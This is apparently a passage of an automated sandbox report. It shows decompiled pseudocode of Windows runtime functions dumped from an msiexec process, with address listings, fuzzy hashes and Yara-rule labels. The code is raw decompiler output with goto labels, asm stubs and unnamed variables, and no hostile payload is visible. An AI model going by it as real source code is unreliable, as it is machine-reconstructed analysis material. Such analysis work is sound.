				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E04D22280(_t26, 0x4df8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E04D1FFB0(_t41, _t51, 0x4df8608);
						L2:
						 *0x4dfb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E04D4B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E04D22280(_t28, 0x4df8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E04D1FFB0(_t42, _t53, 0x4df8608);
							if(_t53 != 0) {
								L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E04D1FFB0(_t41, _t51, 0x4df8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                              0x04d44a2c
                              0x04d44a34
                              0x04d44a3c
                              0x04d44a3e
                              0x04d44a48
                              0x04d44a4b
                              0x04d44a4d
                              0x04d44a51
                              0x04d44a9c
                              0x00000000
                              0x00000000
                              0x04d44aa3
                              0x04d44aa8
                              0x04d44aad
                              0x04d44ab1
                              0x04d44ade
                              0x04d44ae3
                              0x04d44a5a
                              0x04d44a62
                              0x04d44a6a
                              0x04d44a6e
                              0x04d7f203
                              0x04d44a84
                              0x04d44a88
                              0x04d44a89
                              0x04d44a8a
                              0x04d44a95
                              0x04d44a95
                              0x04d44a79
                              0x04d44a80
                              0x04d44af2
                              0x04d44af4
                              0x04d44af9
                              0x04d44aff
                              0x04d44b01
                              0x04d44b03
                              0x04d44b08
                              0x04d7f20a
                              0x04d7f212
                              0x04d7f216
                              0x04d7f216
                              0x04d44b08
                              0x04d44b13
                              0x04d44b1a
                              0x04d7f229
                              0x04d7f229
                              0x04d44b1a
                              0x04d44a82
                              0x00000000
                              0x04d44a82
                              0x04d44ab7
                              0x04d44acd
                              0x04d44acd
                              0x04d44ad5
                              0x04d44ada
                              0x00000000
                              0x04d44ada
                              0x04d44ac2
                              0x04d44acb
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d44acb
                              0x04d44a53
                              0x04d44a53
                              0x04d44a58
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a18a74734eb825d1921fc96fd508e7ccc8c80658d3175118b48aab8055f7ff71
                              • Instruction ID: 9d3184064156c4cc0c631218e184be4d90b12137939050dd57cfff7e80904e0f
                              • Opcode Fuzzy Hash: a18a74734eb825d1921fc96fd508e7ccc8c80658d3175118b48aab8055f7ff71
                              • Instruction Fuzzy Hash: A33102323052509BD731AF14CD42B2AB7A5FFC1718F050929E9964B280D770F884DB96
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D3E730 Relevance: .1, Instructions: 89COMMON
                              Download Yara Rule
                              C-Code - Quality: 74%
                              			E04D3E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04D49670() < 0) {
					L04D5DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x4df7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04D24620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M04D3E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                              0x04d3e730
                              0x04d3e736
                              0x04d3e738
                              0x04d3e73d
                              0x04d3e73e
                              0x04d3e740
                              0x04d3e749
                              0x04d3e765
                              0x04d3e76a
                              0x04d3e76b
                              0x04d3e76c
                              0x04d3e76d
                              0x04d3e76e
                              0x04d3e76f
                              0x04d3e775
                              0x04d3e777
                              0x04d3e77e
                              0x04d7b675
                              0x04d3e784
                              0x04d3e784
                              0x04d3e789
                              0x04d3e7a8
                              0x04d3e7ac
                              0x04d3e807
                              0x04d3e7ae
                              0x04d3e7ae
                              0x04d3e7b1
                              0x04d3e7b4
                              0x04d3e7b9
                              0x04d3e7c0
                              0x04d3e7c4
                              0x04d3e7ca
                              0x04d3e7cc
                              0x00000000
                              0x04d3e7d3
                              0x04d3e7d6
                              0x00000000
                              0x00000000
                              0x04d3e7ff
                              0x04d3e802
                              0x00000000
                              0x00000000
                              0x04d3e7f9
                              0x04d3e7fc
                              0x00000000
                              0x00000000
                              0x04d3e7f3
                              0x04d3e7f6
                              0x00000000
                              0x00000000
                              0x04d3e7ed
                              0x04d3e7f0
                              0x00000000
                              0x00000000
                              0x04d3e7e7
                              0x04d3e7ea
                              0x00000000
                              0x00000000
                              0x04d7b685
                              0x04d7b688
                              0x00000000
                              0x00000000
                              0x04d7b682
                              0x00000000
                              0x00000000
                              0x04d3e7cc
                              0x04d3e7d9
                              0x04d3e7dc
                              0x04d3e7de
                              0x04d3e7de
                              0x04d3e7ac
                              0x04d3e7e4
                              0x04d3e74b
                              0x04d3e751
                              0x04d3e759
                              0x04d3e761
                              0x04d3e761

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: caedb1ca2b5436383595cc492dd97c84989efc68e3dcaa7d1c107508c32a28a3
                              • Instruction ID: 431344b2dd8f466c88493d5080b898e6c97068b1fa11a57aa364be01d52cb2b7
                              • Opcode Fuzzy Hash: caedb1ca2b5436383595cc492dd97c84989efc68e3dcaa7d1c107508c32a28a3
                              • Instruction Fuzzy Hash: B9316DB5A14249EFD744CF68D841B9AB7E4FB59314F148296F904CB381E631FD80CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D3BC2C Relevance: .1, Instructions: 88COMMON
                              Download Yara Rule
                              C-Code - Quality: 67%
                              			E04D3BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x4df6100; // 0x4b
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04D22280(0xd, 0x185cf1a0);
				_t41 =  *0x4df60f8; // 0x0
				if(_t41 != 0) {
					 *0x4df60f8 =  *_t41;
					 *0x4df60fc =  *0x4df60fc + 0xffff;
				}
				E04D1FFB0(_t41, 0x800, 0x185cf1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x4df60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04D24620(0x4df6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x4df6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                              0x04d3bc36
                              0x04d3bc42
                              0x04d3bc45
                              0x04d3bc4a
                              0x04d3bd35
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d3bc50
                              0x04d3bc50
                              0x04d3bc58
                              0x04d3bc5a
                              0x04d3bc60
                              0x00000000
                              0x00000000
                              0x04d7a4f2
                              0x04d7a4f6
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d7a4fc
                              0x04d3bc79
                              0x04d3bc7e
                              0x04d3bc86
                              0x04d3bd16
                              0x04d3bd20
                              0x04d3bd20
                              0x04d3bc8d
                              0x04d3bc94
                              0x04d3bcbd
                              0x04d3bcca
                              0x04d3bccb
                              0x04d3bccc
                              0x04d3bccd
                              0x04d3bcce
                              0x04d3bcd4
                              0x04d3bcea
                              0x04d3bcee
                              0x04d3bcf2
                              0x04d3bd00
                              0x04d3bd04
                              0x00000000
                              0x04d3bc96
                              0x04d3bcab
                              0x04d3bcaf
                              0x04d3bd2c
                              0x04d3bd2c
                              0x04d3bd09
                              0x00000000
                              0x04d3bd09
                              0x04d3bcb1
                              0x04d3bcb5
                              0x04d3bcbb
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d3bcbb

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0a37e2dba58ec9fb947180ee239fd22cc40c9e34c54f8528297350d9eb8dc030
                              • Instruction ID: f215a90f37e327b7ba2317c8dd2238d2702b2e43388fc3b90ef6a952fe82de6b
                              • Opcode Fuzzy Hash: 0a37e2dba58ec9fb947180ee239fd22cc40c9e34c54f8528297350d9eb8dc030
                              • Instruction Fuzzy Hash: FF31EE32A006559BDB21DF68E4807A673B4FF18316F15007AED49DB306EB79FD068B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D31DB5 Relevance: .1, Instructions: 87COMMON
                              Download Yara Rule
                              C-Code - Quality: 60%
                              			E04D31DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E04D2F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L04D24620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E04D2F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                              0x04d31dc2
                              0x04d31dc5
                              0x04d31dc7
                              0x04d31dcc
                              0x04d31dce
                              0x04d31dd6
                              0x04d31ddf
                              0x04d31de0
                              0x04d31de1
                              0x04d31de5
                              0x04d31de8
                              0x04d31def
                              0x04d31df0
                              0x04d31df6
                              0x04d31df7
                              0x04d31dfe
                              0x04d31e1a
                              0x00000000
                              0x00000000
                              0x04d31e0b
                              0x04d31e12
                              0x04d31e12
                              0x04d31e00
                              0x04d31e00
                              0x04d31e05
                              0x04d31e1e
                              0x04d31e23
                              0x04d7570f
                              0x04d75713
                              0x00000000
                              0x00000000
                              0x04d75719
                              0x04d75719
                              0x04d31e2c
                              0x04d31e2d
                              0x04d31e2e
                              0x04d31e2f
                              0x04d31e31
                              0x04d31e32
                              0x04d31e35
                              0x04d31e3d
                              0x04d75723
                              0x04d7573d
                              0x04d7573d
                              0x00000000
                              0x04d75723
                              0x04d31e49
                              0x04d31e4e
                              0x04d31e4e
                              0x04d31e09
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                              • Instruction ID: 27deb414ec64b3112c9a7818474bdadd24959197961038a703c8347ed0d7bc74
                              • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                              • Instruction Fuzzy Hash: 14217C7260011AFFD721CF9ACD80EAEBBB9FF85785F114065E905A7210DA35BE01DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D09100 Relevance: .1, Instructions: 87COMMON
                              Download Yara Rule
                              C-Code - Quality: 76%
                              			E04D09100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x4ddf6e8);
				E04D5D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E04DD88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E04D5D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x4df86c0; // 0x30507b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x4df86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04D22280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E04DD88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E04D4AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x4dfb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x4df84c0;
										if(_t69 >=  *0x4df84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E04DD9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E04D0922A(_t82);
							_t53 = E04D27D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E04DD8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x4df86c0; // 0x30507b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x4df86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x4df86bc;
										_t72 = 0x4df86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04D09240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x4df86c4;
									_t72 = 0x4df86c0;
									L18:
									E04D39B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                              0x04d09100
                              0x04d09100
                              0x04d09100
                              0x04d09100
                              0x04d09102
                              0x04d09107
                              0x04d0910c
                              0x04d09110
                              0x04d09115
                              0x04d09136
                              0x04d09143
                              0x04d637e4
                              0x04d637e4
                              0x04d09149
                              0x04d0914e
                              0x04d0914e
                              0x04d09117
                              0x04d0911d
                              0x00000000
                              0x00000000
                              0x04d0911f
                              0x04d09125
                              0x00000000
                              0x04d09151
                              0x04d09158
                              0x04d0915d
                              0x04d09161
                              0x04d09168
                              0x04d63715
                              0x00000000
                              0x04d0916e
                              0x04d0916e
                              0x04d09175
                              0x04d09177
                              0x04d0917e
                              0x04d0917f
                              0x04d09182
                              0x04d09182
                              0x04d09187
                              0x04d09187
                              0x04d0918a
                              0x04d0918d
                              0x04d0918f
                              0x04d09192
                              0x04d09195
                              0x04d09198
                              0x04d09198
                              0x04d09198
                              0x04d0919a
                              0x00000000
                              0x00000000
                              0x04d6371f
                              0x04d63721
                              0x04d63727
                              0x04d6372f
                              0x04d63733
                              0x04d63735
                              0x04d63738
                              0x04d6373b
                              0x04d6373d
                              0x04d63740
                              0x00000000
                              0x00000000
                              0x04d63746
                              0x04d63749
                              0x00000000
                              0x00000000
                              0x04d6374f
                              0x04d63751
                              0x00000000
                              0x00000000
                              0x04d63757
                              0x04d63759
                              0x04d6375c
                              0x04d6375c
                              0x04d6375e
                              0x04d6375e
                              0x04d63761
                              0x04d63764
                              0x00000000
                              0x00000000
                              0x04d63766
                              0x04d63768
                              0x04d637a3
                              0x04d637a3
                              0x04d637a5
                              0x04d637a7
                              0x04d637ad
                              0x04d637b0
                              0x04d637b2
                              0x04d637bc
                              0x04d637c2
                              0x04d637c2
                              0x04d637b2
                              0x04d09187
                              0x04d09187
                              0x04d0918a
                              0x04d0918d
                              0x04d0918f
                              0x04d09192
                              0x04d09195
                              0x00000000
                              0x04d09195
                              0x00000000
                              0x04d09187
                              0x04d6376a
                              0x04d6376a
                              0x04d6376c
                              0x04d6376c
                              0x04d6376f
                              0x04d63775
                              0x00000000
                              0x00000000
                              0x04d63777
                              0x04d63779
                              0x00000000
                              0x00000000
                              0x04d63782
                              0x04d63787
                              0x04d63789
                              0x04d63790
                              0x04d63790
                              0x04d6378b
                              0x04d6378b
                              0x04d6378b
                              0x04d63792
                              0x04d63795
                              0x04d63795
                              0x04d63798
                              0x04d63798
                              0x04d6379b
                              0x04d6379b
                              0x04d091a3
                              0x04d091a9
                              0x04d091b0
                              0x04d091b4
                              0x04d091b4
                              0x04d091bb
                              0x04d091c0
                              0x04d091c5
                              0x04d091c7
                              0x04d637da
                              0x04d091cd
                              0x04d091cd
                              0x04d091cd
                              0x04d091d2
                              0x04d091d5
                              0x04d09239
                              0x04d09239
                              0x04d091d7
                              0x04d091db
                              0x04d091e1
                              0x04d091e7
                              0x04d091fd
                              0x04d09203
                              0x04d0921e
                              0x04d09223
                              0x00000000
                              0x04d09223
                              0x04d09205
                              0x04d09208
                              0x04d0920c
                              0x04d09214
                              0x04d09214
                              0x04d091e9
                              0x04d091e9
                              0x04d091ee
                              0x04d091f3
                              0x04d091f3
                              0x04d091f3
                              0x04d091e7
                              0x00000000
                              0x04d091db
                              0x04d09187
                              0x04d09168

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bf765aded13f370ad2db3f8be4f31bf751dec5a979ddb9034d0237d59fcb6103
                              • Instruction ID: 63fa848a7e64bdb1e946c2593ac3997703051f556a662057760b9e9e718f1079
                              • Opcode Fuzzy Hash: bf765aded13f370ad2db3f8be4f31bf751dec5a979ddb9034d0237d59fcb6103
                              • Instruction Fuzzy Hash: BD31B0B1B01644DFEB21EF68C4A8BACBBF1FB49354F18C199D41567282C374B980DB62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D20050 Relevance: .1, Instructions: 81COMMON
                              Download Yara Rule
                              C-Code - Quality: 53%
                              			E04D20050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x4dfd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04D39ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E04D4B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E04DD8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04D39702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x4dfb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                              0x04d20055
                              0x04d2005d
                              0x04d20062
                              0x04d2006c
                              0x04d2006f
                              0x04d20074
                              0x04d2007a
                              0x04d2007a
                              0x04d20080
                              0x04d20080
                              0x04d20087
                              0x04d2008d
                              0x04d2008f
                              0x04d20093
                              0x04d20095
